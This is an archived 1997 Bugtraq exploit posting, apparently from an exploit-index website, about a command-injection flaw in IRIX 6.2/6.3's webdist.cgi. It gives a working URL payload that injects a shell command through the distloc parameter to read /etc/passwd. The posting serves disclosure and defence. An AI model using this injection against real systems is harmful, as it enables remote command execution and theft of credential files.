IRIX webdist CGI vulnerability

Summary
Description:Stupid cgi
Author:Grant Kaufmann <grant@CAPE.INTEKOM.COM>
Compromise:remotely execute arbitrary commands as httpd process owner (usually nobody or daemon)
Vulnerable Systems:IRIX 6.2, 6.3
Date:7 May 1997
Details


Date: Wed, 7 May 1997 08:51:48 +0200
From: Grant Kaufmann <grant@CAPE.INTEKOM.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: SGI Advisory: webdist.cgi

I'm glad to see they finally stumbled on this one.

---------------------------------------------------
Title: Default IRIX cgi-bin programs
OS: irix
OSver: 6.2,6.3
Files: /var/www/cgi-bin/webdist.cgi
Perms: X
Access: Remote

/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

--
Grant

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]